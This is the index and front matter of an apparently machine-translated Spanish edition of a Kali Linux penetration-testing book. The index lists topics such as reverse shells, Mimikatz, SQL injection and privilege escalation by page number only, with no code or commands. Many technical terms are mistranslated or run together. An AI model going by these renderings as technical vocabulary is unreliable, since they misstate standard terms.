468–475 Docker Hub, 470 archivo acoplable , 472 Sistema de nombres de dominio (DNS), 45–46 Enumeración del sistema de nombres de dominio (DNS) sobre, 84 DNSfuerza bruta, 85–86 Subdominios DNS, 87–88 Transferencia de DNS, 86–87 comillas dobles, 52 descargando Kaliimágenes, 186 PowerShellscript, 120–121 máquinas virtuales (VM), 428–429 comando dpkg , 40 PatoPatoGo, 91 Herramienta DynamicApplicationSecurityTesting(DAST), 255 reenvío dinámico de puertos, 316–317 Y comando de eco , 50, 189–190 Cortafuegos de ECorp, 312–313 EIP, control, 383–385 correo electrónico, envío, 106–110 protocolos de correo electronico sobre, 136–137 IMAP4 (Puerto 143), 141–142 Canal de Telegram : @IRFaraExam Machine Translated by Google POP3 (Puerto 110), 141–142 SMTP (Puerto 25), 137–141 servidor de correo electrónico, explotación, 183–185 habilitación de proxies, 148–149 codificación, 227–228 cifrado asimétrico, 328–331 fundamentos de, 326–328 simétrica, 326 puntos de entrada, 252 enumerando Véase también fase de enumeración avanzada sobre, 246 CRON, 266–267 elementos del sitio, 236–237 SNMP, 157–158 usuarios, 138–141 Sistema Windows, 273–284 flujo de trabajo para, 127, 135 mensajes de error, 150 conexiones establecidas, 46–47 directorio /etc , 2 foreverblueexploit, 197–198 manejo de excepciones, 407 comandos ejecutivos de bases de datos, 210–215 fase de explotación sobre, 161 explotación de servicios, 173–198 Canal de Telegram : @IRFaraExam Machine Translated by Google evaluación de vulnerabilidades, 162–172 escenarios de explotación para servidores FTP, 126–127 para servidores SSH, 130–131 para servidor Telnet, 135 explotando sobre, 169–171 CRON, 266–267 secuencias de comandos entre sitios (XSS) mediante encabezado, 205–207 Ventana acoplable (Puerto 2375), 185–190 servidor de correo electrónico, 183–185 Protocolo de transferencia de archivos (FTP) (Puerto 21), 173–177 Comando de búsqueda , 268–269 encontrar coincidencias, 288–289 Jenkins, 190-193 servicios en ejecución, 270 tareas programadas, 302 SearchSploit, 171–172 servicios en Windows, 297–302 Protocolo SMB, 196–198 Servicio SSH, 178–179 desbordamiento de pila , 378–388 Telnet (Puerto 23), 179–183 Webenumerationand, 231–250 Aplicaciones de Windows, 293–296 Sistema Windows, 286–303 extracción de datos de formulario, 150–151 Canal de Telegram : @IRFaraExam Machine Translated by Google F falso positivo, 82 Elemento de menú de favoritos (KaliXfceDesktop), 430–432 comando fdisk , 37 Herramienta feroz, 87–88 comando de archivo , 19 inclusión de archivos sobre, 217–218 local (LFI), 218 remoto (RFI), 219–220 fileiteración, 61–62 FileManager(KaliXfceDesktop), 442–443 renombrar archivo, 226–227 protocolos de intercambio de archivos sobre, 154 SMB (Puerto 445), 154–157 SNMP (PortUDP 161), sistema de archivos 157–158 sobre, 2–3 comandos básicos de ventana de terminal, 3–6 Ventana Tmuxterminal, 6–10 Protocolo de transferencia de archivos (FTP) (Puerto 21), 126–130, 173–177 Protocolo de transferencia de archivos seguro (FTPS), 126 transferencias de archivos sobre, 47–48, 284 Destino de host de Linux, 285–286 Destino de host de Windows, 284–285 Canal de Telegram : @IRFaraExam Machine Translated by Google Subir archivo sobre, 223 eludiendo la validación, 225–226 tipo de contenido, codificación 227 , 227–228 filerename, 226–227 contenido de la carga útil, 227 simple, 223–225 condiciones de archivo/directorio, 60 gestión de archivos/carpetas sobre, 406–407 visualización de archivos/carpetas, 15–16 compresión de archivos, 21–22 filtrado de texto, 27–28 gestión de archivos de texto, 24–26 manipulación de directorios, 23 manipulación de archivos, 19–20 montaje de directorios, 23–24 permisos, 16–19 buscando archivos, 20–21 búsqueda de texto, 27–28 vim contra nano, 26–27 Estándar de jerarquía del sistema de archivos (FHS), 2 filtrado de texto, 27–28 buscar comando, 20–21, 261, 268–269 Buscar función, 399 comando findstr , 275 Canal de Telegram : @IRFaraExam Machine Translated by Google huellas dactilares,huellas versus, 90 Configuración del cortafuegos, 201 registros de marcas, 357 Focustab (KaliXfceDesktop), 452–453 administración de carpetas. Ver gestión de archivos/carpetas Fontstab (KaliXfceDesktop), 438 huella,huellas dactilares versus, 90 bucle for , 61–62, 405 datos de formulario, extracción, 150– 151 solicitudes de formulario, interceptación, 149–150 cadenas de formato, 397–398 barra diagonal(/), 2 comando de actualización completa , 40 funciones Basscriptand, 56–57 hachís unidireccional, 320–321 Pitón, 400–402 cuerda, 398–399 GRAMO Ficha General(KaliXfceDesktop), 442 comando git , 47 variables globales, 57, 402 Go Buster, 246 google, 91 idiotas de Google, 92 Consultas de Google, 92–94 Protocolos gráficos remotos, 152–153 Canal de Telegram : @IRFaraExam Machine Translated by Google gráficos, creación, 100–103 comando grep , 13, 15, 20, 24–25, 27–28, 196 comando groupadd , 14 grupos sobre, 286 listado, 277–279 gestión en Kali, 10–15 H información de hardware, 36–38 crackeo de hash Consulte cryptographyandhashcracking hashdump, 306–307 código autenticado de mensaje basado en hash (HMAC), 325 hachís archivos de juego de caracteres, 342 usando, 331–343 hash algoritmos, 321 fundamentos de, 320–322 contraseñas, 323–325 reutilización de hashes, 310–312 escenarios, 321 Ventanas, 306–312 mando principal , 24–25 encabezados,explotandoXSSusando, 205–207 Alto (H), en CVSS, 347, 348 comando de historia , 5 registros históricos, para informes, 350 Canal de Telegram : @IRFaraExam Machine Translated by Google / directorio de inicio, 3 comando de host , 86 información del anfitrión, 36 hostingPowerShellscripts, 119–120 comando de nombre de host , 36 Enumeración HTTP, 81–82 ataques híbridos , 342–343 Hidra uso de portales web de fuerza bruta , 147–151 fuerza bruta con, 136, 150–151 SSHcon, 132 I comando icacls , 282 Icontab(KaliXfceDesktop), 437, 441 iconos,eliminación, 454 comando id , 12–13 identificación de hosts vivos, 72–74 declaración if , 58–59, 403 comando ifconfig , 43 sentencia if/else , 403 imágenes, Docker, 469–470 IMAP4 (Puerto 143), 141–142 Depurador de inmunidad análisis de búfer con, 372–376 para ingeniería inversa, 363–367 importar módulos, 394 registros de índice, 355 Canal de Telegram : @IRFaraExam Machine Translated by Google inyección de carga útil, 386–388 entrada, 394–395 validación de entrada, 415–417 InsightVM, 162 parches instalados, 276 instalando VScode, 391–392 base de datos, 201–202 Estibador , 468–469 KaliLinux, 458–466 OpenVAS, 164–165 PHP, 201 instanciar, 408 Integridad(I),enCVSS, 348 interactuando con los servicios de Windows, 297 interceptar solicitudes de formularios, 149–150 Protocolo de mensajes de control de Internet (ICMP), 68 Recopilación de información en Internet sobre, 89–90 huella pasiva, 90–103 reconocimiento, 90–103 Direccionamiento de protocolo de Internet (IP), 69–72 Motores de búsqueda de Internet, 90–94 Pestaña de intrusos (BurpSuite), 239–241 comando ipaddr , 43 comando ipconfig , 279–280 IPv4, 42–43, 69 Canal de Telegram : @IRFaraExam Machine Translated by Google IPv6, 70–71 Ficha Elementos (KaliXfceDesktop), 450 j Java shell, 194 JavaScript, sin pasar por la validación, 207–208 Jenkins (Puerto 8080/50000), 145–147, 190–193 JMPInstrucción, 384–385 PARA KaliLinuxEscritorio sobre, 427 descarga de máquinas virtuales (VM), 428–429 Escritorio KaliXfce, 429–453 ejemplo práctico, 454–466 ejecutando máquinas virtuales (VM), 428–429 Escritorio KaliXfce, 429–453 Kennedy, David (líder de seguridad), 106 kernelexploits sobre, 258 vaca sucia, 258–261 Ventanas, 287–293 combinaciones de teclas, Tmux, 7 transferencia de llaves, 189–190 Menú de teclado (KaliXfceDesktop), 445 atajos de teclado, ventana de terminal Tmux, 10 Ficha del teclado (KaliXfceDesktop), 452 espacio de teclas, 339 Canal de Telegram : @IRFaraExam Machine Translated by Google comando matar , 42 I ÿl comando, 15 labenvironment, edificio. Ver ventana acoplable (Port2375) LANManager(LM), 306 último comando, 13 movimiento lateral. Ver movimiento pivotante y lateral Ficha Layout(KaliXfceDesktop), 447 función len , 398 menos mando, 24–25 directorio /lib , 2 sangría de línea, 394 LinEnum, 271 Destino de host de Linux, 285–286 Escalada de privilegios de Linux sobre, 257 scripts automatizados, 270–271 Trabajos CRON, 264–267 explotación de servicios en ejecución, 270 kernelexploits, 258–261 configuraciones faltantes, 258–261 anulación del archivo passwd , 263– 264 explotación de setuserID (SUID), 261–263 comando sudo , 268–269 LinuxExploitSuggester, 271 LinuxPrivChecker, 271 oyentes Canal de Telegram : @IRFaraExam Machine Translated by Google cargas útiles y, 110–115 comenzando, 118 Littleendian, 360 anfitriones en vivo identificar, 72–74 buscar, 418–419 cargandoBurpSuitePro, 232–233 Local (L), en CVSS, 347 inclusión de archivo local (LFI), 218 reenvío de puerto local, 314–315 localizar comando, 20 página de inicio de sesión, 249 loopiteraciones, 404– 405 loops, Bashscriptingand, 57–62 /directorio perdido+encontrado , 3 Bajo (L), en CVSS, 347, 348 comando ls , 15 comando lsblk , 24, 37 comando lsusb , 38 METRO Maltego, 99 ataques de máscara , 339–342 /mediadirectory,3 miembros, 408 segmentos de memoria, 361 Ficha Menú (KaliXfceDesktop), 440–441 MessageDigest versión 5 (MD5), 321–322 Canal de Telegram : @IRFaraExam Machine Translated by Google MetasploitPrivEsc, 289–293 MetasploitPro, 169, 194–195 métodos, 408 MicrosoftSQLServer(Puerto1433), 142 Ventana del editor de tipos MIME (KaliXfceDesktop), 447 Mimikatz, 308–309 permisos de servicio mal configurados, 297–298 configuraciones faltantes, 258–261 directorio /mnt , 3 módulos, importando, 394 más mando, 25 comando de montaje , 38 directorios de montaje, 23–24 Ratón y ventana del panel táctil (KaliXfceDesktop), 448 Veneno de MSF, 195–196 MutillidaeDockercontainer, 474–475 Instalación de Mutillidae, 200–202 comando mv , 19, 20 MySQL (Puerto 3306), 143 norte Nano,vim versus, 26–27 Neso, 162 comando netlocalgroup , 278 comando de usuario de red, 277 comando netsh , 281 comando netstat , 46 Red (N), en CVSS, 346 Canal de Telegram : @IRFaraExam Machine Translated by Google Escaneo de hosts de red sobre, 65 conceptos básicos de redes, 65–72 DNSenumeración, 84–88 exploración de redes, 72–84 interfaz de red, 42–45 husmeador de redes, 66 redes sobre, 42, 473–474 Sistema de nombres de dominio (DNS), 45–46 conexiones establecidas, 46–47 transferencias de archivos, 47–48 información, 279–282 interfaz de red, 42–45 Nexpose, 162 Nmap sobre, 73–74, 246 enumeración avanzada, 137–138 scripting avanzado escanear con, 128–129, 131–132 enumeracion basica, 137 exploraciones, 76–77 comando nmapÿh , 79 NmapScriptingEngine (NSE), 80–84 Ninguno (N), en CVSS, 347, 348 NTLanManager(NLTM)hashes, 306–307 números, 395– 396 condiciones numéricas, 59 Canal de Telegram : @IRFaraExam Machine Translated by Google O ubicación de desplazamiento, 382–383 función hash unidireccional, 320–321 inteligencia de código abierto (OSINT), 90 Capas de interconexión de sistemas abiertos (OSI), 68–69 OpenWebApplicationSecurityProject(OWASP)Top 10, 228–229 OpenVAS, análisis de vulnerabilidades con, 164–169 huellas dactilares del sistema operativo, 79–80 directorio /opt , 3 argumentos opcionales, 401–402 Servidor de base de datos Oracle (Puerto 1521), 143 OSinformación, 36 salida, 394–395 PAGS gestión de paquetes, 39–41 Ventana de panel (KaliXfceDesktop), 449 pasando el hash (PTH), 311–312 huella pasiva, 90–103 recopilación de información pasiva, 90–103 comando contraseña, 14–15 , 23 archivo passwd , invalidación, 263–264 sin contraseña SSH, 32–34 contraseñas hash, 323–325 gestión, 14–15 reutilización, 310–312 parches, instalados, 276 Canal de Telegram : @IRFaraExam Machine Translated by Google creación de patrones, carga útil 382 ejecutar, 289 inyectando, 386–388 oyentes y, 110–115 contenido de la carga útil, 227 Robot de prueba de penetración, 411–426 pruebas de penetración sobre, 411 Robot de prueba de penetración, 411–426 informesen, 345–346 perla, 193 permisos, 16–19, 282–283, 286 suplantación de identidad, 105 PHP instalación, 201 carcasa, 194 Físico (P), en CVSS, 347 ping, 73 comando de ping , 73 pitchforkattack, 240 movimiento pivotante y lateral sobre, 305 pivotingwithportredirection, 312–317 Hashes de Windows, 306–312 punteroregistros, 355 Instrucción POP, 371 Canal de Telegram : @IRFaraExam Machine Translated by Google POP3 (Puerto 110), 141–142 Escaneo de puertos y servicios, 74–76 reenvío de puertos, 312–314 números de puerto, 71–72 dirección de puerto , rotación con, 312–317 escaneo de puertos y servicios, 420–423 Puerto Swigger, 232 Contenido del formulario POST, 150 Potencia Shell sobre, 194 descargar guión, 120–121 ejecución de guión, 120–121 generar scripts, 118–122 shell inverso usando USBRubberDuckyand, 117–118 corriendo, 120 PowerUp, 302–303 practicar Python, 392–393 presentingreports,349–351 función print_custom() , 57 comando imprimirf , 50–52 impresión CLIargumentos, 395 a la pantalla en Bash, 50–52 clave privada, 32 PrivEscherramientas automatizadas, 302–303 Privilegio requerido (PR), en CVSS, 347 directorio / proc , 2 Canal de Telegram : @IRFaraExam Machine Translated by Google gestión de procesos , 41–42 procesos, listado, 283–284 Entorno de producción (implementación final) (SDLC), 255 base de datos de protocolos, 142–143 correo electrónico, 136–142 intercambio de archivos, 154–158 comunicación remota gráfica, 152–153 redes, 66 apoderados BurpSuit, 234 habilitación, 148–149 cadenas proxy, comando de 316 ps , 41–42 PSExectotool, 296 clave pública, 32 PUSHinstrucción, 370–371 comando pwd , 23 Pitón. Ver también pruebas de penetración sobre, 389 sintaxis básicas, 393–395 fundamentos de, 389–390 comentarios en, 393 scripts de depuración, 391–392 funciones, 400–402 paquetes, 414 practicando, 392–393 Canal de Telegram : @IRFaraExam Machine Translated by Google ejecución de scripts , 390 envío de correo electrónico utilizando, 108–109 Shellcodescript, 387–388 técnico, 400–409 variable, 395–400 Pythonshebang, 393 Concha de pitón, 194 q QualysScanner, 162 consultando bases de datos, 208–210 citas, 52 R Rápido7, 162 RDP (Puerto 3389), 152–153 valores de lectura en listas, 399 Elemento de menú Usado recientemente (KaliXfceDesktop), 433 reconocimiento, 90–103 scripting de sitio cruzado reflejado (XSS), 203–204 registros, Docker, 469–470 permisos de registro, débil, 301 conexiones remotas sin contraseña SSH, 32–34 Protocolo de escritorio remoto (RDP), 29 SecureShell (SSH), 30 SSH con credenciales, 30–31 Protocolo de escritorio remoto (RDP), 29 Canal de Telegram : @IRFaraExam Machine Translated by Google inclusión de archivos remotos (RFI), 219–220 reenvío de puertos remotos, mediante SSH, 315–316 carcasa remota, 386–388 renombrar ventanas, 7 Repeatertab(BurpSuite), 238–239 función de reemplazo , 398 replicar ataques, usando USBRubberDucky, 122 informeresumen, 350 informes sobre, 345 creando enBurpSuite, 244–245 pruebas de penetración, 345–346 presentación, 349–351 revisión, 167–169 gravedades de puntuación, 346–349 Obligatorio (R), en CVSS, 347 restablecer/cambiar contraseña, 249–250 recursos, 286 valores devueltos, 401 reutilización de hashes/contraseñas, 310–312 Ingeniería inversa. Ver lenguaje ensamblador e ingeniería inversa carcasa inversa sobre, 112–113, 121, 193–194 usandoSET, 113–115 usando USBRubberDucky y PowerShell, 117–118 usando con Metasploit, 194–195 revisión de informes, 167–169 Canal de Telegram : @IRFaraExam Machine Translated by Google Rivest Shamir Adleman (RSA), 329–331 comando rm , 19, 23 / directorio raíz , 3 cáscara de raíz, 289 comando de impresión de ruta, 280 /ejecutar directorio, 3 corriendo contenedores, 187 PowerShell, 120 Pythonscripts, 390 servicios, 38–39, 270 máquinas virtuales (VM), 428–429 como en Windows, 295–296 S directorio /sbin , 2 tareas de escáner, creación, 166–167 escaneo, para hosts activos, 418–419 tareas programadas, explotación, 302 Alcance (S), en CVSS, 347 gravedades de puntuación, 346–349 pantalla, impresión a la, 50–52 guiones. Véase también bashscripting parámetros, 54–56 Pitón, 390–392 barra de búsqueda (KaliXfceDesktop), 430 motores de búsqueda, 90–94 SearchSploit, 171–172 Canal de Telegram : @IRFaraExam Machine Translated by Google Algoritmo de hash seguro (SHA), 323 SecureShell (SSH) (Puerto 22) sobre, 30, 130–134 con Credenciales, 30–31 uso de reenvío dinámico de puertos, 316–317 servicio de explotación, 178–179 conHydra, 132 generación de claves, 188– 189 uso de reenvío de puertos remotos, 315– 316 tunelización, 314–315 Archivo SecurityAccountManager (SAM), 306–307 registros de segmento, 355–356 self, 408 envío de correo electrónico, 106–110 cuentas de servicio, 286 ejecutable de servicio, reemplazando, 299 servicioscan, 127–128, 135 enumeración de servicios, 74–76, 77–79 explotación de servicios sobre, 173 Estibador, 185-190 correo electrónico, 183–185 servicio FTP operativo, 173–177 servicio SSH operativo , 178–179 Jenkins, 190-193 carcasas inversas , 193–196 Protocolo SMB, 196–198 Canal de Telegram : @IRFaraExam Machine Translated by Google Telnet, 179–183 en Windows, 297–302 gestión de sesiones, Tmux, 7–8 SET, bombardeo inverso, 113–115 explotación de setuserID (SUID), 261–263 Configuración (KaliXfceDesktop), 438–439 ver (Python), 393 Shodan, 91–92 SidePanetab (KaliXfceDesktop), 444 Protocolo de administración de red simple (SNMP (Puerto UDP 161)), 157–158 comillas simples, 52 inicio de sesión único (SSO), 310 SMB (Puerto 445), 154–157, 196–198 SMTP (Puerto 25), 137–141 husmear, para obtener información de texto claro, 180–183 ataque de francotirador, 240 ataques de ingeniería social sobre, 105 oyentes, 110–115 cargas útiles, 110–115 ataques de spearphishing, 105–110 con USBRubberDucky, 115–122 Kit de herramientas de ingeniería social (SET), 106 ciclo de vida de desarrollo de software (SDLC) sobre, 250 Fase de análisis/arquitectura, 251–252 Fase de desarrollo, 252–255 Canal de Telegram : @IRFaraExam Machine Translated by Google Fase del entorno de producción (implementación final), 255 Fase de prueba, 255 ordenar comando, 26 código spaghetti, 56–57 proyectiles de desove, 177 ataques de spearphishing, 105–110 función dividida , 398 dividir ventanas, 8 SQLinjection(SQLi) sobre, 208 automatización con SQLMap, 215–216 omitiendo la página de inicio de sesión, 210 uso de comandos de base de datos ejecutivos , 210–215 uso de comandos de base de datos ejecutivos mediante SQLi, 210–215 consultando base de datos, 208–210 prueba para, 216 SQLMap, SQLinjectionautomationwith, 215–216 directorio /srv , 3 desbordamiento de pila. Ver búfer/desbordamiento de pila conjuntos de caracteres estáticos, 341 direccionamiento IP estático, 43–45 escaneo sigiloso, 75 secuencias de comandos cruzadas almacenadas (XSS), 204–205 modo directo, 336 condiciones de cadena, 59 cuerdas, 397–399 función de tira , 398 Canal de Telegram : @IRFaraExam Machine Translated by Google Styletab(KaliXfceDesktop), 436–437, 452 su comando, 12, 14–15 subredes, 69–70 comando sudo , 12, 268–269 cifrado simétrico, 326 SYNscan, 75 sintaxis, Python, 393–395 directorio /sys , 2 gestión del sistema sobre, 34–35 información de hardware, 36–38 información del anfitrión, 36 gestión de servicios en ejecución, 38–39 OSinformación, 36 gestión de paquetes, 39–41 gestión de procesos, 41–42 comando systeminfo , 274–275, 287–288 T comando de cola , 24–25 extensión tar, 22 listas de objetivos, creación, 166 Targettab(BurpSuite), 234–236 tareas, listado, 283–284 TCPportSYNscan, 75 Telnet (Puerto 23), 134–136, 179–183 Tenible, 162 terminalventana Canal de Telegram : @IRFaraExam Machine Translated by Google sobre, 1 gestión de archivos/carpetas, 15–28 Sistema de archivos KaliLinux, 2–10 gestión de usuarios/grupos, 10–15 redes, 42–48 conexiones remotas, 29–34 gestión de sistemas, 34–42 pruebas punto de referencia, 332–334 Conexión Docker, 185–186 para inyección SQL (SQLi), 216 stackoverflowand, 379–381 Fase de prueba (SDLC), 255 texto, filtrado/búsqueda, 27–28 caracteres de paisaje de texto, 407–409 archivos de texto , gestión, 24–26 theHarvester, 97–99 terceros, 252 apretón de manos de tres vías, 66 directorio /tmp , 3 Ventana Tmuxterminal, 6–10 comando táctil , 19 protocolos de transferencia sobre, 126 Protocolo de transferencia de archivos (FTP) (Puerto 21), 126–130 SSH (Puerto 22), 130–134 Telnet (Puerto 23), 134–136 Canal de Telegram : @IRFaraExam Machine Translated by Google TransformHub, 99–103 Protocolo de control de transmisión (TCP), 66–67 niveles de confianza, 252 tunelización, SSH, 314–315 tuplas, 400 tu UDPportscan, 75–76 comando uname , 36 Sin cambios (U), en CVSS, 347 comando uniq , 26 ruta de servicio sin comillas, 299–301 comando de actualización , 39–40 actualización de elementos de lista, 399 comando de actualización , 39–40 subir página, 249 URLruta, 150 USBRubberDucky, ingeniería social con, 115–122 cuentas de usuario, 286 comandos de usuario, 10–13 Protocolo de datagrama de usuario (ARRIBA), 67 entrada de usuario, 56 Interacción del usuario (IU), en CVSS, 347 registro de usuario, 249 comando del usuario , 13 usuarios enumerar, 138–141 enumerar, 277–279 Canal de Telegram : @IRFaraExam Machine Translated by Google managementinKali, 10–15 directorio /usr , 3 Aplicaciones habituales (KaliXfceDesktop), 432–433 V validación, omisión, 225–226 valores listas de lectura, 399 regresando, 401 directorio /var , 3 Variables sobre, 52–54, 395 operadores aritméticos, 397 conjunto incorporado, 340–341 comandos, 54 diccionario, 400 mundial, 402 listado, 399–400 números, 395–396 cuerdas, 397–399 tuplas, 400 versiones escaneadas, 77–79 vim, Nano versus, 26–27 máquinas virtuales (VM), descarga y ejecución, 428–429 VisualStudioCode, para C/C++, 362–363 VNC (Puerto 5900), 153–154 volúmenes, 472–473 Comando VRFY , 138–139 Canal de Telegram : @IRFaraExam Machine Translated by Google VScode, instalación, 391–392 evaluación de vulnerabilidades sobre, 162, 247 Investigación de exploits , 169–172 Exploración de vulnerabilidades con OpenVAS, 164–169 flujo de trabajo, 162–164 sección de vulnerabilidades, en informes, 350–351 aplicación vulnerable, 379 Aplicación Vulnserver, 379 EN Vulnerabilidades de aplicaciones web sobre, 199–200 inyección de comando , 217–220 falsificación de solicitud entre sitios, 220–223 secuencias de comandos entre sitios, 203–208 carga de archivos , 223–228 Instalación de Mutillidae, 200–202 OWASP Top 10, 228–229 Inyección SQL, 208–216 Webenumeración y explotación, 231–250 Portales web, fuerza bruta usando Hydra, 147–151 Protocolos web 80/443 , 151, 153–154 herramienta wesng , 288 qué comando, 20–21, 177, 220 bucle while , 60–61, 404–405 comando whoami , 276–277 Base de datos Whois, 95–96 Canal de Telegram : @IRFaraExam Machine Translated by Google WindowManagerwindow(KaliXfceDesktop), 451–452 ventanas, 7–8 Windows (Microsoft) arquitectura, 275 explotación de aplicaciones, 293–296 explotación de servicios en, 297–302 sistema operativo , 286–303 hashes, 306–312 destinohost, 284–285 kernelexploits, 287–293 PrivEscherramientas automatizadas, 302–303 corriendo como un loco, 295–296 Escalada de privilegios de Windows sobre, 273 transferencias de archivos , 284–286 enumeración del sistema, 273–284 explotación del sistema, 286–303 WindowsPrivilegeEscalationAwesomeScripts(WinPEAS), 303 Wireshark, 66–67 Utilidad WMIC, 275–276 ataque a la lista de palabras, 336 flujo de trabajo, evaluación de vulnerabilidad, 162–164 Ventana de espacios de trabajo (KaliXfceDesktop), 450–451 CON extensión .zip, 22 Canal de Telegram : @IRFaraExam Machine Translated by Google Copyright©2021porJohnWiley&Sons,Inc.,Indianápolis,IndianaPublicadosimultáneamenteenCanadá ISBN:978-1-119-71908-3 ISBN: 978-1-119-71964-9 (ebk) ISBN: 978-1-119-71907-6 (ebk) FabricadoenlosEstadosUnidosdeAmérica Nopartofthispublicationmaybereproduced, anymeans storedinaretrievalsystemortransmittedinanyformorby, electrónico, mecánico, fotocopia, grabación, scanningorotherwise, exceptaspermitted underSections107or108ofthe1976UnitedStatesCopyrightAct, withouteitherthepriorwritten permissionofthePublisher, orauthorizationthroughpaymentoftheappropriateper-copyfeetothe CopyrightClearanceCenter, 222RosewoodDrive, Danvers, MA01923, (978) 750-8400, fax (978) 6468600.RequeststothePublisherforpermissionshouldbeaddressedtothePermissionsDepartment, John Wiley&Sons, Inc.,111RiverStreet,Hoboken,NJ07030,(201)748ÿ6011,fax(201)748ÿ6008,o línea en http://www.wiley.com/go/permissions . LimitofLiability / DisclaimerofWarranty: Thepublisherandtheauthormakenorepresentationsor warrantieswithrespecttotheaccuracyorcompletenessofthecontentsofthisworkandspecifically disclaimallwarranties, includingwithoutlimitationwarrantiesoffitnessforaparticularpurpose.No warrantymaybecreatedorextendedbysalesorpromotionalmaterials.Theadviceandstrategiescontained hereinmaynotbesuitableforeverysituation.Thisworkissoldwiththeunderstandingthatthepublisheris notengagedinrenderinglegal, lo que representa, orotherprofessionalservices.Ifprofessionalassistanceis requiere, theservicesofacompetentprofessionalpersonshouldbesought.Neitherthepublishernorthe authorshallbeliablefordamagesarisingherefrom.ThefactthatanorganizationorWebsiteisreferredto inthisworkasacitationand / orapotentialsourceoffurtherinformationdoesnotmeanthattheauthoror thepublisherendorsestheinformationtheorganizationorwebsitemayprovideorrecommendationsitmay make.Further, disapp readersshouldbeawarethatInternetwebsiteslistedinthisworkmayhavechangedor oído entre cuando este trabajo fue escrito y cuando se lee. Para obtener información general sobre nuestros otros productos y servicios, comuníquese con nuestro Departamento de Atención al Cliente dentro de los Estados Unidos al (877) 762ÿ2974, fuera de los Estados Unidos al (317) 572ÿ3993 o fax (317) 572ÿ 4002. Wiley publica una variedad de formatos impresos y electrónicos y mediante impresión bajo demanda. Algunos materiales incluidos con las versiones impresas estándar de este libro pueden no estar incluidos en libros o en impresión bajo demanda . . Para obtener información sobre los productos Wiley, visite www.wiley.com . Número de control de la Biblioteca del Congreso: 2021904285 Marcas comerciales: Wiley y el logotipo de Wiley son marcas comerciales o marcas comerciales registradas de John Wiley & Sons, Inc. y/o sus filiales, en los Estados Unidos y en otros países, y no puede usarse sin permiso por escrito. Linux es una marca comercial registrada de Linus Torvalds. Todas las demás marcas comerciales son propiedad de sus respectivos dueños. John Wiley & Sons, Inc. no está asociado con ningún producto o proveedor mencionado en este libro. Canal de Telegram : @IRFaraExam Machine Translated by Google Sobre el Autor GusKhawaja es un experto en seguridad de aplicaciones y pruebas de penetración. He es consultor de seguridad cibernética en Montreal, Canadá, y tiene una gran experiencia trabajando con organizaciones para proteger sus activos de ataques cibernéticos. He es un autor publicado e instructor en línea en el campo de la seguridad cibernética. Canal de Telegram : @IRFaraExam Machine Translated by Google Acerca del editor técnico Corey Ball es un experto en seguridad cibernética con más de 10 años de experiencia en TI y liderazgo en seguridad cibernética. Se especializa en pruebas de penetración de API, aplicaciones web y redes. Actualmente cuenta con más de 10 certificaciones de seguridad cibernética, incluidas OSCP , CISSP, CISM y CCISO. Tiene una licenciatura en artes en inglés y filosofía de CSU Sacramento. Canal de Telegram : @IRFaraExam Machine Translated by Google Expresiones de gratitud He tenido la suerte de compartir mi conocimiento y experiencia con mi audiencia a través de Wiley. Espero que este conocimiento lo convierta en el mejor experto en su carrera como probador de penetración. Estoy especialmente agradecido a mi familia que me apoyó para entregar 18 capítulos completos de este libro. Tengo la suerte de tener experiencia previa en programación que me ayudó mucho en mi carrera como probador de penetración y como experto en seguridad de aplicaciones. Te darás cuenta de que en estos días, tener habilidades en la arquitectura de aplicaciones web te permitirá dominar esta carrera. Finalmente, me gustaría agradecer a los miembros del equipo de Wiley que me apoyaron durante el viaje de escribir este increíble libro. ¡Sin este apoyo, este libro nunca habría visto la luz del día! Canal de Telegram : @IRFaraExam Machine Translated by Google ACUERDO DE LICENCIA DE USUARIO FINAL DE WILEY Vaya a www.wiley.com/go/eula para acceder al EULA del libro electrónico de Wiley. Canal de Telegram : @IRFaraExam